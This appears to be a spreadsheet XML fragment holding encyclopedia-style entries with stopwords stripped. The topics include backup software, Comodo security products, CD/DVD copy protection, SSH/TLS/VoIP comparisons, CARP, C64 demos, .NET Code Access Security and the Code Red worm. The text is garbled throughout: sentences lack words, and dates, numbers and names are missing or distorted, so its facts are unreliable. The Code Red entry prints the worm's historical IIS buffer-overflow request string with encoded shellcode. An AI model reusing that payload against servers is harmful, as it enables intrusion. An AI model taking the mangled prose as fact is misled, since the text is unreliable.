    <t>commvault american publicly traded data protection data management software company headquartered tinton falls, jersey. commvault enterprise software used data backup recovery, cloud infrastructure management, retention compliance. history commvault originally formed 1988 development group bell labs focused data management, backup, recovery; later designated business unit at&amp;t network systems. after becoming part lucent technologies, unit sold 1996 became corporation, scotty neal ceo.in march 1998, hammer joined commvault chairman, president ceo, bunte joined vice president coo. 2000, company began releasing products aimed managing network storage. march 2006, commvault filed initial public offering, officially went public later year cvlt nasdaq. 2013, company moved space oceanport, jersey, $146 million headquarters former fort monmouth tinton falls, jersey.on february 2019, sanjay mirchandani replaced retiring hammer president ceo, nick adamo announced chairman board. mirchandani joined commvault puppet, oregon-based automation company, served ceo. software commvault software enterprise-level data platform contains modules back restore, archive, replicate, search data. built ground-up single platform unified code base. four product lines: complete backup recovery, hyperscale integrated appliances, orchestrate disaster recovery, activate analytics. software available across cloud on-premises environments.data protected installing agent software physical virtual hosts, operating system application native apis protect data consistent state. production data processed agent software client computers backed data manager, mediaagent, disk, tape, cloud storage. data management activity environment tracked centralized server, commserv, managed administrators central user interface. users access protected data using browsers mobile devices. 2008, commvault launched remote operations management service storage management small midsize businesses. 2009, company's backup software product simpana version offered industry's first global embedded software deduplication, allowing users deduplicate data matter stored. 2015, following release simpana version product renamed commvault software. 2017, commvault began sell hyperscale backup data protection appliances, following year later adding high capacity hyperscale appliances, standalone remote office appliance. also 2017, commvault cisco systems announced scaleprotect, combining hyperscale software reference architecture cisco unified computing system, giving enterprise customers ability manage secondary data cloud-like, on-premises solution. july 2018, company announced newly packaged four products name commvault complete: commvault complete backup recovery, commvault hyperscale, commvault orchestrate, commvault activate. october 2019, commvault launched metallic, saas backup recovery service mid-market, allowing customers backup on-premises data backup system, public cloud, metallic's public cloud, combination both.commvault partnered companies including cisco systems, hewlett packard enterprise, microsoft, amazon services, ibm, google. services commvault provides consulting services customers. company advises customers setting data management systems architecture design implementation monitoring. remote managed service, commvault manages software production customers. acquisitions september 2019, commvault announced would acquire software-defined storage startup hedvig, acquisition valued $225 million. acquisition completed october.on february 2022, commvault announced acquired israel based cyber security company trapx. also list companies references</t>
  </si>
  <si>
    <t>Comodo Internet Security</t>
  </si>
  <si>
    <t>comodo internet security (cis) developed distributed comodo group, freemium internet security suite includes antivirus program, personal firewall, sandbox, host-based intrusion prevention system (hips) website filtering. version history release cloud antivirus protection spyware scanning capabilities added. could clean malware found effectively, comodo cleaning essentials developed supplement cis.host-based intrusion prevention system: comodo's host-based intrusion prevention system (hips), named defense+, designed provide protection unknown malware.its purpose limit operations unfamiliar programmes well access files, directories, settings, windows registry. defense+ default refuses unknown program install execute except specifically allowed user file appears comodo's whitelist. sandbox added defense+ isolate unknown applications. release released february 2013, provided major revision user interface significant features fully sandboxed desktop environment. release march 2014, comodo announced completion beta testing release became official april 2014. this release includes virus monitoring tool called virusscope filtering features provide control user access content. release became official november 2014. includes enhanced auto-sandboxing features. release became official december 2016. includes secure shopping, prevention malware intercepting online transactions. release became official june 2018. includes many stability performance changes. release became official march 2019. includes extra functionality creating rules full support windows october 2018 update. comodo endpoint security manager (cesm) comodo endpoint security manager (cesm) server product centrally managing security settings security components network endpoint computers. cesm manages distribution updates antivirus firewall software.the antivirus firewall software managed cesm versions software used consumer versions comodo internet security reception reviews magazine lead security analyst, neil rubenking, reviewed comodo firewall comodo internet security november 2008, giving first second. praised suite's firewall capabilities criticized antimalware capabilities. 2009, roboert vamosi world reviewed comodo internet security gave score criticizing "disappointing malware detection" based av-test result "limited feature set".three years three version later, comodo antivirus results became significantly better. january 2012, rubenking reviewed comodo internet security 2012 (v5.0), giving stars praised support service antimalware features panned "effectively default" firewall, defense+ popups, lack parental control, antispam, antiphishing, privacy protection features, finally, "low ratings independent labs".in january 2013 review, techworld awarded comodo internet security 2013 stars concluded "cloud-based scanning behaviour analysis joins suite top-notch security tools, designed keep secure. recommended." also date, mike williams betanews.com reviewed comodo internet security 2013 concluded "the program remains complex total beginners, suspect. average user appreciate largely automatic operation, though, experts enjoy powerful tools extreme configurability."on february 2013, comodo internet security complete earned magazine editor's choice award. reviewing software again, neil reubenking gave score stars, commended support service, solution, comodo secure service value price criticized behavior blocker poor anti-phishing capabilities. reubenking concluded "the biggest comodo internet security complete 2013 features, support. geekbuddy service fixes problem, security otherwise, using remote assistance. virus-free guarantee reimburses damage malware gets past comodo; also reimbursed expenses related identity theft. geekbuddy-powered tuneup tool unusually powerful backup utility winner."once again, magazine lead security analyst, neil rubenking, reviewed comodo internet security 2019 poor performance. independent test labs av-test, anti-virus test based germany, tested comodo. products surpass industry standard (measured mean score participating products) awarded certificate. comodo internet security participated tests since 2010, first time february 2013, comodo internet security premium version obtained av-test certificate field home products.on january 2013, matousec, independent tester security software, analyzed security products proactive defense capabilities ranked comodo internet security 2013 premium (v6) number one. comodo internet security 2013 tested windows internet explorer passed tests (92%). also ranked number 2012. also internet security comparison antivirus software comparison firewalls references external links official website official anti-malware database</t>
  </si>
  <si>
    <t>Comodo Mobile Security</t>
  </si>
  <si>
    <t>comodo mobile security (cms) mobile application provided free comodo group protects android devices viruses, worms scripts. also features call blocking, software process manager, data apps backup data traffic monitor. anti-theft feature allows users recover lost stolen devices.this first security comodo, specialists internet security, android platform.comodo mobile security requires android major releases released april 2012.cms released january 2014. major enhancements include: cloud antivirus scans. scans malware using local cloud-based detection engines. support android kitkat® (4.4). added language support arabic, bulgarian, greek, english, spanish, farsi, french, italian, polish, russian, swedish, turkish, ukrainian, chinese. layout design offers easier navigation, icons backgrounds.cms released june 2014.new features: tablet version: tablets secure now. supports devices chipsets.enhancements improved notification behavior, select notified every scan malware found various fixes performed.cms released december 2014. changes comodo mobile security 2.7: improved virus detection optional password protection application removal false positive feedback option fixes independent test labs june 2013, av-test labs released test results android mobile security products conducted 2013 using android 4.2.2. comodo mobile security scored protection perfect usability av-test's testing categories.in january 2015, av-test labs released test results android mobile security products conducted january 2015 using android 5.0.1 comodo mobile security scored protection perfect usability av-test's testing categories. reviews softonic.com reviewed comodo mobile security january 2012 gave stars, rating excellent.rosemary hattersley advisor gave comodo mobile security stars. wrote “this smartphone good all-rounder, offering initial health check, plus ‘anti-theft’ tools guise remote lock, wipe device location, plus alert someone changes phone, free." also comodo dragon comodo icedragon comodo internet security comodo system utilities comodo references external links comodo mobile antivirus comodo antivirus android source</t>
  </si>
  <si>
    <t>Compact Disc and DVD copy protection</t>
  </si>
  <si>
    <t>cd/dvd copy protection blanket term various methods copy protection dvds. such methods include drm, cd-checks, dummy files, illegal tables contents, over-sizing over-burning physical errors sectors. many protection schemes rely breaking compliance standards, leading playback problems devices. protection schemes rely distinctive features that: applied medium manufacturing process, protected medium distinguishable unprotected one. cannot faked, copied, retroactively applied unprotected medium using typical hardware software. technology filesystems dummy files most cd-roms iso9660 file system organize available storage space computer player. this effect establishing directories (i.e., folders) files within directories. usually, filesystem modified extensions intended overcome limitations iso9660 filesystem design. these include joliet, rockridge torito extensions. these are, however, compatible additions underlying iso9660 structure, complete replacements modifications. basic approach distinctive feature purposely fake information within filesystem. early generations software copied every single file original medium re-created filesystem target medium. sectors sector primary data structure cd-rom accessible external software (including os). mode-1 cd-rom, sector contains 2048 bytes user-data (content) bytes structural information. among things, structural information consists sector number, sector's relative absolute logical position error detection code (edc), advanced checksum used detect possible) read-errors error correction code (ecc), advanced method detecting correcting errorsusing information, drive detect repair many (but all) types read-error. copy protections fields distinctive feature purposely crafting sectors improper edc/ecc fields manufacture. protection software tries read sectors, awaiting read-errors. early generations end-user soft/hardware able generate sectors illegal structural information, feature could re-generated soft/hardware. sectors forming distinctive feature become readable, medium presumed copy. modification approach uses large regions unreadable sectors small islands readable ones interspersed. most software trying copy protected media skip intervals sectors confronted unreadable ones, expecting bad. contrast original approach, protection scheme expects sectors readable, supposing medium copy read-errors occur. sub-channels beside main-channel holds user-data, cd-rom contains eight sub-channels certain meta-information stored. (for audio user-data audio itself; data filesystem file data.) sub-channels q-channel states drive's current position relative beginning current track. this designed audio-cds (which years cds), information used keep drive track; nevertheless q-channel filled even data-cds. another sub-channel, p-channel (which first subchannels) carries even primitive information—a sort semaphore—indicating points track starts. every q-channel field contains 16-bit checksum content, copy protection field distinguish original medium copy. early generations end-user soft/hardware calculated q-channel themselves, expecting carry valuable information. modern software hardware able write information given subchannels twin sectors this technique exploits sectors cd-rom addressed drive seeks sector another. every cd-rom sectors state logical absolute relative position corresponding sector-headers. drive information told retrieve seek certain sector. note information physically "hard-wired" cd-rom part user-controlled data. part unprotected cd-rom look like (simplified): when drive told read seek sector 6553, calculates physical distance, moves laser-diode starts reading (spinning) disc, waiting sector 6553 come protected cd-rom look like this: example, sector inserted ("mary") sector-address identical right insertion-point (6553). when drive told read seek sector 6553 disc, resulting sector-content depends position drive starts seeking from. drive seek forwards, sector's original content "jill" returned. drive seek backwards, sector's twin "mary" returned.a protected program check whether cd-rom original positioning drive behind sector 6553 reading expecting mary version appear. when program tries copy cd-rom, miss twin-sector drive skips second 6553-sector, seeking sector 6554. there details technique (e.g. twin-sectors need recorded large extents, subq-channel modified etc.) omitted. twin sectors right next shown, reader would always read first one, jill; twin sectors need farther apart disc. data position measurement stamped perfect clones data always position, whereas writable media differ other. data position measurement (dpm) detects little physical differences efficiently protect duplicates. first used publicly 1996 link data security's cd-cops. securom later uses protection method, nintendo optical discs. changes followed book cd-da audio specification include copy protection mechanism simple anti-copy flag. starting early 2002, attempts made record companies market "copy-protected" non-standard compact discs. philips stated discs permitted bear trademarked compact disc digital audio logo violate book specification. there great public outcry copy-protected discs many threat fair use. example, audio tracks media cannot easily added personal music collection computer's hard disk portable (non-cd) music player. also, many ordinary audio players (e.g. radios) problems playing copy-protected media, mostly used hardware firmware components also used cd-rom drives. reason reuse cost efficiency; components meet book standard, valid reason existed them. other stereos supported cd-rom discs containing compressed audio files (such mp3, flac, windows media) cd-rom drive hardware (meeting yellow book cd-rom standard) order capable reading discs. late 2005, sony music sparked sony copy protection scandal included form copy protection called extended copy protection ("xcp") discs artists. upon inserting disc drive computer running microsoft windows, software would installed. ripper software software, real-time effects program, reads digital audio disc ripper) subsequently access music tracks would substitute white noise audio disc. technically inclined users computer security professionals found contains rootkit component. after installation, went great lengths disguise existence, even attempted disable computer's drive forcibly removed. xcp's efforts cloak unfortunately allowed writers malware amplify damage done software, hiding malware xcp's cloak installed victim's machine. several publishers antivirus anti-spyware software updated products detect remove found, grounds trojan horse malware; assistant secretary united states' department homeland security chastised companies would cause security holes customers' computers, reminding companies computers. facing resentment class action lawsuits sony issued product recall discs including xcp, announced suspending future discs. november 2005 texas attorney general greg abbott sued sony december 2005 sued sony mediamax copy protection. united kingdom position provisions allow redress buyers audio copyright-protection. copyright, designs patents 1988 contains provisions section 296ze part allow "[a] remedy effective technological measures prevent permitted acts". practice, consumer would make complaint copyright holder audio usually record label. complaint would contain request holder copyright provide "work-around" order make copy-protected extent non-copyright protected could used lawfully. where consumer believes copyright holder reasonable entertaining request, within rights make application secretary state review merits complaint complaint upheld) instruct copyright holder implement work-around circumventing copyright protection. schedule copyright, designs patent 1988 lists permitted acts, provisions section 296ze apply (i.e. lists cases consumer remedy, copy protection prevents user permitted act). also list compact disc copy protection schemes list copy protection schemes references external links cdmediaworld's protection page</t>
  </si>
  <si>
    <t>URL Snooper</t>
  </si>
  <si>
    <t>snooper program find urls streaming media data. this allows streamed files download download manager. scope stream recorder. usually uses library pcap/winpcap packet capturing also comparison download managers external links official website streaming media recording software pyurlsnooper independent open source (uses pcapy packet capturing)</t>
  </si>
  <si>
    <t>Comparison of SSH clients</t>
  </si>
  <si>
    <t>client software program uses secure shell protocol connect remote computer. this article compares selection notable clients. general platform operating systems virtual machines clients designed without emulation include several possibilities: partial indicates works, client lacks important functionality compared versions still development.the list exhaustive, rather reflects common platforms today. technical features authentication algorithms this table lists standard authentication algorithms implemented clients. some implementations include server client implementations support custom non-standard authentication algorithms listed table. also comparison servers comparison client software comparison remote desktop software references</t>
  </si>
  <si>
    <t>Comparison of SSH servers</t>
  </si>
  <si>
    <t>server software program uses secure shell protocol accept connections remote computers. sftp/scp file transfers remote terminal connections popular cases server. general platform operating systems virtual machines servers designed without emulation; several possibilities: indicates exist never released. partial indicates works, server lacks important functionality compared versions still development. beta indicates version fully functional released, still development (e.g. stability). indicates officially released fully functional, stable version. dropped indicates server works, versions longer released indicated number parentheses last known stable version officially released included indicates server comes pre-packaged integrated operating system.the list exhaustive, rather reflects common platforms today. features also list sftp server software comparison clients references</t>
  </si>
  <si>
    <t>Comparison of TLS implementations</t>
  </si>
  <si>
    <t>transport layer security (tls) protocol provides ability secure communications across networks. this comparison implementations compares several notable libraries. there several implementations free software open source. comparison categories stable version implementation listed overview section. comparison limited features directly relate protocol. overview protocol support several versions protocol exist. deprecated protocol version significant weaknesses. (1996) (1999) successors weaknesses cbc-padding explained 2001 serge vaudenay. (2006) fixed problems, switching random initialization vectors (iv) block ciphers, whereas problematic mac-pad-encrypt instead secure pad-mac-encrypt addressed 7366. workaround 1.0, roughly equivalent random 1.1, widely adopted many implementations late 2011, security perspective, existing version 1.0, provide equivalent strength base protocol suitable 128-bit security according nist sp800-57 least 2030. 2014, poodle vulnerability discovered, takes advantage known vulnerabilities cbc, insecure fallback negotiation used browsers.tls (2008) introduced means identify hash used digital signatures. while permitting stronger hash functions digital signatures future (rsa,sha256/sha384/sha512) conservative choice (rsa,sha1+md5), protocol change inadvertently substantially weakened default digital signatures provides (rsa,sha1) even (rsa,md5).datagram transport layer security (dtls datagram tls) modification packet-oriented transport layer, packet loss packet reordering tolerated. revision dtls based published january 2012.note known vulnerabilities 3.0. with exception predictable (for easy workaround exists) currently known vulnerabilities affect version 1.0/1.1/1.2 alike. suite cryptography required components suite cryptography (rfc 6460) are: advanced encryption standard (aes) sizes bits. traffic flow, used either counter mode (ctr) bandwidth traffic galois/counter mode (gcm) mode operation high bandwidth traffic (see block cipher modes operation) symmetric encryption elliptic curve digital signature algorithm (ecdsa) digital signatures elliptic curve diffie–hellman (ecdh) agreement secure hash algorithm (sha-256 sha-384) message digestper cnssp-15, 256-bit elliptic curve (specified fips 186-2), sha-256, 128-bit keys sufficient protecting classified information secret level, 384-bit elliptic curve (specified fips 186-2), sha-384, 256-bit keys necessary protection secret information. certifications note certain certifications received serious negative criticism people actually involved them. exchange algorithms (certificate-only) this section lists certificate verification functionality available various implementations. exchange algorithms (alternative key-exchanges) certificate verification methods encryption algorithms notes obsolete algorithms notes supported elliptic curves this section lists supported elliptic curves implementation. defined curves 8446 (for 1.3) 8422, 7027 (for earlier) proposed curves deprecated curves 8422 notes data integrity compression note crime security exploit takes advantage compression, conservative implementations enable compression level. http compression unrelated unaffected exploit, exploited related breach attack. extensions section extensions implementation supports listed. note secure renegotiation extension critical https client security. clients implementing vulnerable attacks, irrespective whether client implements renegotiation. assisted cryptography this section lists known ability implementation take advantage instruction sets optimize encryption, utilize system specific devices allow access underlying cryptographic hardware acceleration data separation. system-specific backends this section lists ability implementation take advantage available operating system specific backends, even backends provided another implementation. cryptographic module/token support code dependencies development environment portability concerns also sctp dtls support dccp dtls support srtp dtls support (dtls-srtp) secure real-time transport control protocol (srtcp) references</t>
  </si>
  <si>
    <t>Comparison of VoIP software</t>
  </si>
  <si>
    <t>this comparison voice (voip) software used conduct telephone-like voice conversations across internet protocol (ip) based networks. residential markets, voice phone service often cheaper traditional public switched telephone network (pstn) service remove geographic restrictions telephone numbers, e.g., pstn phone number york area code ring tokyo. businesses, voip obviates separate voice data pipelines, channelling types traffic network giving telephony user range advanced abilities. softphones client devices making receiving voice video calls network standard functions original telephones usually allow integration voip phones phones instead using computer's microphone speakers headset). most softphone clients open session initiation protocol (sip) supporting various codecs. skype runs closed proprietary networking protocol additional business telephone system (pbx) software allow based telephone system connect skype network. online chat programs also incorporate voice video communications. other voip software applications include conferencing servers, intercom systems, virtual foreign exchange services (fxos) adapted telephony software concurrently support voip public switched telephone network (pstn) like interactive voice response (ivr) systems, dial dictation, hold call recording servers. some entries web-based voip; standalone desktop applications. desktop applications discontinued softphone service mobile phones mobile voip clients: frameworks libraries server software secure voip software voip software client-to-client encryption following table overview voip clients (can) provide end-to-end encryption. voip software client-to-server encryption following table overview voip clients (normally) provide client-to-server encryption. notes also comparison audio coding formats comparison instant messaging clients comparison conferencing software list codecs list software list video telecommunication services product brands matrix (communication protocol) secure communication comparison user features messaging platforms references</t>
  </si>
  <si>
    <t>UES (cipher)</t>
  </si>
  <si>
    <t>cryptography, (universal encryption standard) block cipher designed 1999 helena handschuh serge vaudenay. they proposed transitional step, prepare completion process. designed interface aes: block size bits size 128, 192, bits. consists parallel triple encryptions halves block, whitening key-dependent swapping bits halves. schedule taken deal. references handschuh, vaudenay august 1999). universal encryption standard. selected areas cryptography (sac '99). queen's university, kingston, ontario: springer-verlag. 1–12. citeseerx 10.1.1.1.8843.</t>
  </si>
  <si>
    <t>UDPCast</t>
  </si>
  <si>
    <t>udpcast file transfer tool send data simultaneously many destinations lan. this instance used install entire classrooms once. advantage udpcast using methods (nfs, ftp, whatever) udpcast uses user datagram protocol's multicast abilities: take longer install machines would install default protocol operates port 9000. this default behaviour changed boot stage. also list disk cloning software external links official website</t>
  </si>
  <si>
    <t>Common Address Redundancy Protocol</t>
  </si>
  <si>
    <t>common address redundancy protocol carp computer networking protocol allows multiple hosts local area network share addresses. primary purpose provide failover redundancy, especially used firewalls routers. configurations, carp also provide load balancing functionality. carp provides functionality similar virtual router redundancy protocol (vrrp) cisco systems' standby router protocol (hsrp). implemented several bsd-based operating systems ported linux (ucarp). example single computer running packet filter, goes down, networks either side packet filter longer communicate other, communicate without packet filtering. however, computers running packet filter, running carp, fails, take over, computers either side packet filter aware failure, operation continue normal. order make sure active/primary operates one, packet filter used must support synchronization state computers. principle redundancy group hosts using carp called "group redundancy". group redundancy allocates address shared divided among members group. within group, host designated "active/primary". members "standby". main host "takes" address. answers traffic request brought attention address. each host belong several groups redundancy. each host must second unique address. common carp creation group redundant firewalls. virtual address allotted group redundancy indicated address default router computers behind group firewalls. main firewall breaks disconnected network, virtual address taken firewall slaves service availability interrupted. history late 1990s internet engineering task force (ietf) began work protocol router redundancy. 1997, cisco informed ietf patents area and, 1998, pointed patent hsrp. nonetheless, ietf continued work vrrp. after debate, ietf vrrp working group decided approve standard, despite reliance patented techniques, long cisco made patent available third parties reasonable non-discriminatory licensing terms. because vrrp fixed problems hsrp protocol, cisco began using vrrp instead, still claiming own.cisco informed openbsd developers would enforce patent hsrp. cisco's position lawsuit alcatel. cisco's licensing terms prevented open-source vrrp implementation, openbsd developers begun developing carp instead. openbsd focuses security. they designed carp cryptography. this made carp fundamentally different vrrp ensured carp infringe cisco's patent. carp became available october 2003. later, integrated freebsd (first released 2005 freebsd 5.4), netbsd linux (ucarp). while cisco's patent expired 2014, incompatible protocols continue coexist. incompatibility ietf standards openbsd uses vrrp's protocol number addresses. openbsd project requested unique numbers internet assigned numbers authority (iana) denied. allocate numbers, iana several requirements. time, specified 2780. requirements include participating collaborative, lengthy discussion process within ietf producing detailed textual specification protocol. openbsd developers neither requirement. openbsd's website states following: final note course, petitioned iana, ietf body regulating[sic] "official" internet protocol numbers, give numbers carp pfsync, request denied. apparently failed official standards organization. consequently forced choose protocol number would conflict anything else value, decided place carp protocol 112. also placed pfsync open unused number. informed iana decisions, declined reply. iana assigned protocol number vrrp 1998, 2338). protocol number remains vrrp. carp also uses range ethernet addresses ieee assigned iana/ietf vrrp protocol.in spite overlap, still possible vrrp carp broadcast domain, long vrrp group carp virtual host different. also gateway load balancing protocol (glbp) hsrp pfsync vrrp network multipathing (ipmp) references external links carp(4) openbsd kernel interfaces manual carp(4) freebsd kernel interfaces manual ucarp: userland carp implementation netbsd port carp openbsd song 3.5: "carp license" "redundancy must free"</t>
  </si>
  <si>
    <t>Commodore 64 demos</t>
  </si>
  <si>
    <t>commodore (c64) demos demonstrations done push limits commodore computer, made programmers, musicians artists. though unusual find demos displayed single picture, music tracks programming skill, groups formed consisted members skilled composing music, drawing graphics programming. full disk demos produced, would play music next file loaded, without delay sound. various effects achieved demos, undocumented side-effects pertaining technology vic-ii chip. some examples are: sprite scrollers placed border. tricking hardware draw border around screen, sprites could moved area displayed. sprites multiplexed across vertical raster lines (over sprites, sometimes sprites). common perception sprites could appear screen, assigning coordinates started drawn made reappear screen. (flexible line distance) moved bitmap character rows arbitrary number vertical raster lines apart, making possible arbitrarily move pixel high graphic block smoothly across screen. adding sine curves positioning provided wavy effect. fli, flexible line interpretation, used increase number unique colors appear block screen. this mode occasionally extended sprites and/or interlacing bitmaps together shifli uifli). these modes usually cause left-most pixels display become unusable. (flexible pixel positioning), basically variation mode, allows placement line character-based graphic y-position, allowing effects like x-rotating logos, barrel-like effects smooth stretching waving whole screen. tec-tec (also tech-tech tac) assigns x-position line graphic. using animated sine waves could example wave logo horizontally screen. (variable screen positioning), also known hsp, allows arbitrary x-placement bitmap, bitmap wrapping around border. linecruncher allows user scroll bitmap larger screen vertically without move bitmap data manually. agsp (any given screen position) combination linecruncher, example making possible games colorful bitmap graphics scrolled, hannes sommer's "fred's back" series.followers would growth demo scene. gone single file demos scrolling text music. full disk demos produced, would play music next file loaded, without delay sound. hidden parts included occasional game implemented demo. when commodore amiga appeared, many former demo programmers switched platforms continued make demos amiga (see amiga demos). atari demos also heavily influenced demos. united kingdom, main alternative demo scene spectrum demos. popular time local bbses also popular used communicate people. software trading mail also common. some enthusiasts lament loss social interaction locally centered computer activities provided. external links c64.ch demo portal, site demos screenshots digital dungeon (tdd), site demos commodore scene database, scene database touch sceners info scener release event. structured, including information (hidden parts), downloads, screenshots, forum. portal demo scene related news, releases, parties scene related news intros.c64.org large online archive crack intros, first demoscene productions. driven online driven online covering north american demo scene digitalmemoriesdvd.de, digital memories: demos showcases demos 8bit mayhem scene music podcast, obvious, obvious, forgotten classic commodore scene music. commodore demos, early demos, written demoscene colourful raster bars code</t>
  </si>
  <si>
    <t>Command CICS</t>
  </si>
  <si>
    <t>command cics command-cics software product allows organizations migrate "macro level" cics "command level" cics without re-programming companies could migrate later versions cics support macro level application programs. later versions cics offered many advantages previous versions tens thousands application programs effectively locked version unless prepared operate completely different versions cics operating systems, creating operational maintenance problems. different, simultaneous, cics licenses also required. history when cics first released late 1960s, used assembler macros generate system calls cics teleprocessing monitor kernel. this also true even programs written cobol pl/1. dakin independent programmer ltd. u.k., realized creating middleware product, problem could solved almost situations. dakin approached market product received interest time, despite fact tens thousands clients application programs would need converted rewritten versions cics, costing many millions dollars. macro level emulation command-cics intercepted macro level applications link-edited (static) "stub" positioned ahead load module (mvs) phase (dos/vse). gaining control cics program control program (pcp), "pseudo macro level" environment established consisting pointer (unique) pseudo "common system area" (csa), pointer transaction control area plus transaction work area (tca+twa) pseudo terminal control terminal entry (tctte) artifacts macro level environment. before passing control directly original program entry point, command-cics actual general purpose registers, point pseudo control blocks. principal control block holding pointers cics kernel programs (file control program, storage control program etc.) real macro level cics environment. command-cics alternative pointers command-cics entry points instead. possible cedf debug application program calls command-cics used. macro interface application program proceeded execute normal machine code instructions right first macro level call, thus adding zero overhead program point. soon call left application program, command-cics code would gain control replace original linkage own, equivalent, command-level call. original earlier command level cics versions (that supported macro command level programs), cics "exec interface program" (dfheip) converted command level call 'actual macro level call. this would small additional overhead cics calls. later versions cics, however, executed cics directly, imposing additional "backward compatibility" overhead. marketing command-cics initially sold u.k. international mainland europe rest world. present time commandcics offered advanced software products group, inc. naples, florida, united states competition cics/comet z/os similar product unicom systems inc. adds overhead (because requirement dynamically stub). references external links webpage command/cics link unicom webpage aspg webpage cics official website cics official website</t>
  </si>
  <si>
    <t>CommView</t>
  </si>
  <si>
    <t>commview application network monitoring, packet analysis, decoding. there editions commview: standard edition ethernet networks wireless edition 802.11 networks named commview wifi. application runs microsoft windows. developed tamosoft, privately held zealand company founded 1998. functionality commview puts network adapter promiscuous mode captures network traffic. also supports capturing packets dial-up virtual adapters (e.g. adsl modems), well capturing loopback traffic. captured traffic analyzed application displays network statistics individual packets. packets decoded using protocol decoder. commview wifi puts wi-fi adapters monitor mode, providing functionality user experience similar commview, addition wlan-specific features, displaying decoding management control frames, indication signal noise level, per-node per-channel statistics. features protocols distribution, bandwidth utilization, network nodes charts tables. detailed connections statistics: addresses, ports, sessions, etc. voip analysis: h.323 (tmc's internet telephony magazine product year award) wpa2-psk decryption (wireless edition only) multi-channel capturing using several adapters (wireless edition only) packet injection using packet generator user-defined packet filters alarms stream reconstruction packet-to-application mapping reporting capture file import export references external links official commview product page official commview wifi product page</t>
  </si>
  <si>
    <t>Cobian Backup</t>
  </si>
  <si>
    <t>cobian backup free, donation-supported backup software microsoft windows. written delphi luis cobian umeå university. history cobian backup originally released 2000. program later rewritten released version next version (version released 2006. source code later released mozilla public license late january 2007. however, version author cobian backup decided switch back completely closed source model. older versions remain open source forever, release program mozilla public license cannot revoked. development support original author discontinued version 11.2.0.582 source code since sold off.in february 2021 luis cobian announced start development successor program, cobian reflector. features cobian backup supports unicode, ftp, compression (zip, sqx, 7z), encryption (including blowfish, rijndael, des, rsa-rijndael [1]), incremental differential backup, example differential backup every night (which backs user files changed since last full backup) full backup every seventh night (backing full user files). backups saved dvd, memory stick, second hard drive (internal external), etc. supports long file names (32,000 characters) backup routines. also list backup software references external links cobian's site home cobian backup version history cobian backup</t>
  </si>
  <si>
    <t>Code Access Security</t>
  </si>
  <si>
    <t>code access security (cas), microsoft .net framework, microsoft's solution prevent untrusted code performing privileged actions. when loads assembly obtain evidence assembly identify code group assembly belongs code group contains permission (one permissions). code performs privileged action perform code access demand cause walk call stack examine permission granted assembly method call stack. code groups permission sets determined administrator machine defines security policy. microsoft considers obsolete discourages use. also available .net core .net. evidence evidence information associated assembly. default evidences used .net code access security are: application directory: directory assembly resides. publisher: assembly's publisher's digital signature (requires assembly signed authenticode). url: complete assembly launched site: hostname url/remote domain/vpn. zone: security zone assembly resides hash: cryptographic hash assembly, identifies specific version. strong name: combination assembly name, version public signing used sign assembly. signing x.509 certificate, custom pair generated strong naming tool, sn.exe visual studio.a developer custom evidence (so-called assembly evidence) requires writing security assembly version .net facility work. evidence based hash assembly easily obtained code. example, evidence obtained following code clause: policy policy expressions uses evidence determine code group membership. code group gives permission assemblies within group. there four policies .net: enterprise: policy family machines part active directory installation. machine: policy current machine. user: policy logged user. appdomain: policy executing application domain.the first three policies stored files administered .net configuration tool (mscorcfg.msc). final policy administered code current application domain. code access security present assembly's evidence policy take intersection (that permissions common generated permission sets) permissions granted assembly. default, enterprise, user, appdomain policies give full trust (that allow assemblies permissions) machine policy restrictive. since intersection taken, means final permission determined machine policy. note policy system eliminated .net framework 4.0. code group code groups associate piece evidence named permission set. administrator uses .net configuration tool specify particular type evidence (for example, site) particular value evidence (for example, www.mysite.com) identifies permission code group granted. demands code performs privileged action make demand permissions. demand makes walk call stack method ensure demanded permissions method's assembly's granted permissions. permission granted security exception thrown. this prevents downloaded code performing privileged actions. example, assembly downloaded untrusted site assembly file permissions assembly attempts access file, throw exception preventing call. references understanding .net security code access security policy tool (caspol.exe)</t>
  </si>
  <si>
    <t>Code Red (computer worm)</t>
  </si>
  <si>
    <t>code computer worm observed internet july 2001. attacked computers running microsoft's server. first large scale, mixed threat attack successfully target enterprise networks.the code worm first discovered researched eeye digital security employees marc maiffret ryan permeh exploited vulnerability discovered riley hassell. they named "code red" mountain code drinking time.although worm released july largest group infected computers seen july 2001. day, number infected hosts reached 359,000. concept exploited vulnerability worm showed vulnerability growing software distributed iis, described microsoft security bulletin ms01-033, patch available month earlier. worm spread using common type vulnerability known buffer overflow. using long string repeated letter overflow buffer, allowing worm execute arbitrary code infect machine worm. kenneth eichman first discover block invited white house discovery. worm payload payload worm included: defacing affected site display:hello! welcome http://www.worm.com! hacked chinese! other activities based month:days 1-19: trying spread looking servers internet. days 20–27: launch denial service attacks several fixed addresses. address white house server among those. days 28-end month: sleeps, active attacks.when scanning vulnerable machines, worm test server running remote machine running vulnerable version iis, even running all. apache access logs time frequently entries these: /default.ida?nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a http/1.0 worm's payload string following last 'n'. buffer overflow, vulnerable host interpreted string computer instructions, propagating worm. similar worms august 2001, code appeared. although used injection vector, completely different payload. pseudo-randomly chose targets different subnets infected machines according fixed probability distribution, favoring targets subnet often not. additionally, used pattern repeating characters instead characters overflow buffer. eeye believed worm originated makati, philippines, origin vbs/loveletter (aka "iloveyou") worm. also nimda worm timeline computer viruses worms references external links code analysis, steve friedl's unixwiz.net, last update august 2001 caida analysis code-red, cooperative association internet data analysis (caida) diego supercomputer center (sdsc), updated november 2008 animation showing spread code worm july 2001, jeff brown, ucsd, david moore, caida sdsc</t>
  </si>
  <si>
    <t>Code Red II</t>
  </si>
  <si>
